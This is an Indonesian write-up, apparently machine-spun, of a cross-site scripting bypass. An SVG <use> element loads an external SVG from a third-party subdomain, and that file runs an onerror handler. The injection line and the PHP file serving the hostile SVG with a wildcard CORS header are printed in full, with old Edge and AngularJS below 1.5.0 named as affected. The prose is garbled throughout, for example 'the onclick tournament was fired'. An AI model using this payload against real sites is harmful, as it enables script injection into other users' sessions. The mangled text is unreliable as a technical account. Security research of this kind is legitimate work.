Saat memeriksa pembersih SVG bagian dalam, saya menghabiskan beberapa waktu mencari di elemen use. Pada dasarnya ini memungkinkan Anda untuk mereferensikan berbagai faktor SVG dan memasukkannya ke dalam dokumen SVG Anda. Anda dapat mereferensikan URL atau hyperlink asal yang sama ke ID tertentu di halaman web penggunaan hash. Saya menyarankan masalah ini secara internal namun dulu ditolak karena Anda ingin menambahkan SVG ke awal yang sama untuk memaksimalkannya. Jadi arah gagasan saya selanjutnya adalah membuatnya bekerja lintas-asal. Chrome, Firefox, dan Safari semuanya mencegah SVG dari perlindungan lintas-asal. Old Edge dulunya luar biasa, dulunya memungkinkan untuk memasukkan SVG dari fondasi yang unik asalkan Anda menyertakan header CORS Access-Allow-Cross-Origin: *. Awalnya saya melindungi URL JavaScript di SVG eksterior saya dan meskipun faktor tersebut pernah dapat diklik, URL JavaScript tidak menyebutkan peringatan.

Saya memodifikasi file dan mencoba menyuntikkan turnamen onclick dan yang mengejutkan saya, turnamen onclick dipecat dari domain eksterior. Saya memeriksa ulang bahwa area tersebut pernah menjadi area tujuan dengan menggunakan peringatan panggilan (document.domain) dan kebetulan itu mengkonfirmasi domain yang tepat. Saya kemudian menemukan Anda mungkin ingin mengatur SVG eksterior dan membuat vektor dijalankan secara mekanis kecuali klik penggunaan elemen foto.

Injeksinya adalah :

<svg><use href="//subdomain1.lumajangteamsec.my.id/use_element/upload.php#x" />

 Berikut tampilan SVG eksternal :

<?php
header("Access-Control-Allow-Origin: *");
header("Content-Type: image/svg+xml");
?>
<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>
<image href="1" onerror="alert(1)" />
</svg>

Saya kemudian memeriksa AngularJS dan bekerja di sana juga karena mereka mengaktifkan SVG dalam variasi <1.5.0. Berikut adalah bukti lengkap dari pemikiran yang bekerja pada AngularJS 1.4.9.

Perhatikan bahwa variasi AngularJS yang lebih baru tidak lagi rentan karena tidak lagi mengaktifkan SVG.